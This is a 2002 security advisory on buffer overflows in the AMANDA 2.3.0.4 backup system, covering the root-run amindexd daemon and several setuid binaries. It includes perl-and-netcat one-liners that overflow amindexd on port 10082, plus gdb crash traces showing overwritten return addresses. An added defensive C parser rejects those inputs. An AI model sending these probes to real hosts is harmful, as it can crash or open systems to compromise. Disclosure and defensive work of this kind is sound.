Amanda backup system various buffer overflows, local & remote



30th May 2002 [SBWID-5375]

COMMAND

	Amanda various buffer overflows, local & remote

SYSTEMS AFFECTED

	2.3.0.4

PROBLEM

	zillion  [http://www.safemode.org]   published   a   security   advisory
	regarding AMANDA. The Advanced Maryland Automatic Network Disk  Archiver
	(AMANDA) is a backup  system  which  is  available  for  many  different
	Unix-based operating systems. Several setuid and setgid  binaries  which
	are installed by this package contain  buffer  overflow  vulnerabilities
	that  can  be  used  to  execute  shellcode  with  elevated  privileges.
	Additionally, the amindexd daemon contains a remote  overflow  bug  that
	can lead to a remote system compromise.
	

	The affected version of AMANDA is an old package but is often  used  due
	to  compatibility  problems  with  newer  versions.  For  example,  this
	package  was  until  recently  shipped  with  the  FreeBSD   4.5   ports
	collection.
	

	The local overflows are all found in files that can only be executed by
	members of the operator group. This is a big limitation to anyone who is
	trying to abuse amanda locally, as normal users are not members of this
	group. The big risk here is the amindexd daemon (10082/TCP), which runs
	as root and contains several overflows, two of which can be triggered
	without any knowledge of the affected system's configuration.


	The amindexd daemon (remote, runs as root)
	-------------------------------------------

	Long commands sent to this server result in an immediate overflow. This
	does not require any knowledge of the affected system's configuration.
	Simple replication of this overflow:

	perl -e 'print "A" x 260;print "BBBB";' | nc localhost 10082
	perl -e 'print "DATE "; print "A" x 260;' | nc localhost 10082
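	The following is an added example (not code from the AMANDA project or from zillion's advisory) showing the defensive counterpart of the two probes above: a bounded parser for a "VERB [ARG]" line of the kind amindexd reads, which refuses a 260-byte command or argument instead of copying it into a fixed buffer. CMD_MAX (256), parse_command and parse_padded are hypothetical names and sizes assumed for illustration; the advisory does not state amindexd's real buffer size.

```c
#include <string.h>
#define CMD_MAX 256   /* hypothetical size, chosen for illustration only */
struct command {
    char verb[CMD_MAX];   /* e.g. "DATE" */
    char arg[CMD_MAX];    /* rest of the line, may be empty */
};

/* Parse one protocol line ("VERB [ARG]") into *cmd.  Returns 0 on success,
 * -1 when the line or either field would not fit: every copy is bounded by
 * the destination size, so an overlong line is refused instead of being
 * written past the end of a fixed buffer. */
int parse_command(const char *line, struct command *cmd)
{
    size_t len = strcspn(line, "\r\n");       /* ignore line terminator */
    if (len >= CMD_MAX)
        return -1;                            /* whole line too long */
    size_t verb_len = strcspn(line, " ");
    if (verb_len > len)
        verb_len = len;                       /* no argument present */
    if (verb_len == 0 || verb_len >= sizeof cmd->verb)
        return -1;
    memcpy(cmd->verb, line, verb_len);
    cmd->verb[verb_len] = '\0';
    const char *rest = line + verb_len;
    while (*rest == ' ')                      /* skip separator spaces */
        rest++;
    size_t arg_len = len - (size_t)(rest - line);
    if (arg_len >= sizeof cmd->arg)
        return -1;
    memcpy(cmd->arg, rest, arg_len);
    cmd->arg[arg_len] = '\0';
    return 0;
}

/* Build "<prefix><n x fill><suffix>" (the shape of the two probe lines,
 * constructed here as sample input) and parse it; returns parse_command()'s
 * result. */
int parse_padded(const char *prefix, char fill, size_t n, const char *suffix)
{
    char line[1024];
    struct command cmd;
    size_t plen = strlen(prefix), slen = strlen(suffix);
    if (plen + n + slen >= sizeof line)
        return -1;
    memcpy(line, prefix, plen);
    memset(line + plen, fill, n);
    memcpy(line + plen + n, suffix, slen);
    line[plen + n + slen] = '\0';
    return parse_command(line, &cmd);
}
```

	Both probe shapes from the advisory (260 bytes of "A" followed by "BBBB", and "DATE " followed by 260 bytes of "A") are rejected with -1, while a short, well-formed line such as "DATE 20020530" parses normally.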

	

	

	The files listed below are only accessible by users who are members of
	the group 'operator'. This is a big limitation for anyone that will try
	to abuse them ;).


	The amcheck file (setuid root)
	-------------------------------------------

	bash-2.05a# /usr/local/bin/amcheck `perl -e 'print "A" x 1000'`
	Segmentation fault (core dumped)

	(gdb) bt
	#0  0x2814c022 in ?? ()
	#1  0x280f8c0a in ?? ()
	#2  0x804d671 in ?? ()
	#3  0x41414141 in ?? ()
	Cannot access memory at address 0x41414141.
	(gdb)


	The amgetidx file (setuid operator)
	-------------------------------------------

	bash-2.05a# gdb /usr/local/libexec/amanda/amgetidx
	(gdb) r `perl -e 'print "A" x 3000'`
	Starting program: /usr/local/libexec/amanda/amgetidx `perl -e 'print "A" x 3000'`
	(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
	Program received signal SIGSEGV, Segmentation fault.
	0x28144022 in vfprintf () from /usr/lib/libc.so.4
	(gdb) bt
	#0  0x28144022 in vfprintf () from /usr/lib/libc.so.4
	#1  0x280f0c0a in vsprintf () from /usr/lib/libc.so.4
	#2  0x804c8dd in getsockname ()
	#3  0x41414141 in ?? ()
	Error accessing memory address 0x41414141: Bad address.
	(gdb)


	The amtrmidx file (setuid operator)
	-------------------------------------------

	bash-2.05a# gdb /usr/local/libexec/amanda/amtrmidx
	(gdb) r `perl -e 'print "A" x 3000'`
	Starting program: /usr/local/libexec/amanda/amtrmidx `perl -e 'print "A" x 3000'`
	(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
	Program received signal SIGSEGV, Segmentation fault.
	0x28141022 in vfprintf () from /usr/lib/libc.so.4
	(gdb) bt
	#0  0x28141022 in vfprintf () from /usr/lib/libc.so.4
	#1  0x280edc0a in vsprintf () from /usr/lib/libc.so.4
	#2  0x804b291 in free ()
	#3  0x41414141 in ?? ()
	Error accessing memory address 0x41414141: Bad address.
	(gdb)


	The createindex-dump file (setuid operator)
	-------------------------------------------

	sh-2.05a# gdb /usr/local/libexec/amanda/createindex-dump
	(gdb) r `perl -e 'print "A" x 4000'` a a a
	Starting program: /usr/local/libexec/amanda/createindex-dump `perl -e 'print "A" x 4000'` a a a
	(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
	Program received signal SIGSEGV, Segmentation fault.
	0x2814398c in getenv () from /usr/lib/libc.so.4
	(gdb) bt
	#0  0x2814398c in getenv () from /usr/lib/libc.so.4
	#1  0x28142801 in isatty () from /usr/lib/libc.so.4
	#2  0x2814362e in malloc () from /usr/lib/libc.so.4
	#3  0x280fbec2 in popen () from /usr/lib/libc.so.4
	#4  0x8048874 in atoi ()
	#5  0x41414141 in ?? ()
	Error accessing memory address 0x41414141: Bad address.
	(gdb)


	The createindex-gnutar file (setuid operator)
	----------------------------------------------

	bash-2.05a# gdb /usr/local/libexec/amanda/createindex-gnutar
	(gdb) r `perl -e 'print "A" x 4000'` a a a
	Starting program: /usr/local/libexec/amanda/createindex-gnutar `perl -e 'print "A" x 4000'` a a a
	(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
	Program received signal SIGSEGV, Segmentation fault.
	0x2814398c in getenv () from /usr/lib/libc.so.4
	(gdb) bt
	#0  0x2814398c in getenv () from /usr/lib/libc.so.4
	#1  0x28142801 in isatty () from /usr/lib/libc.so.4
	#2  0x2814362e in malloc () from /usr/lib/libc.so.4
	#3  0x280fbec2 in popen () from /usr/lib/libc.so.4
	#4  0x8048811 in atoi ()
	#5  0x41414141 in ?? ()
	Error accessing memory address 0x41414141: Bad address.
	(gdb)

SOLUTION

	Upgrade AMANDA to the latest stable version, which is available from
	the developers' web site: http://www.amanda.org
	

	As noted earlier, this affects the  FreeBSD  ports  collection  that  is
	shipped with 4.5 or earlier. FreeBSD was contacted and has  removed  the
	vulnerable AMANDA port.
	

	Thanks to the AMANDA developers and FreeBSD for the fast reaction to
	this issue.

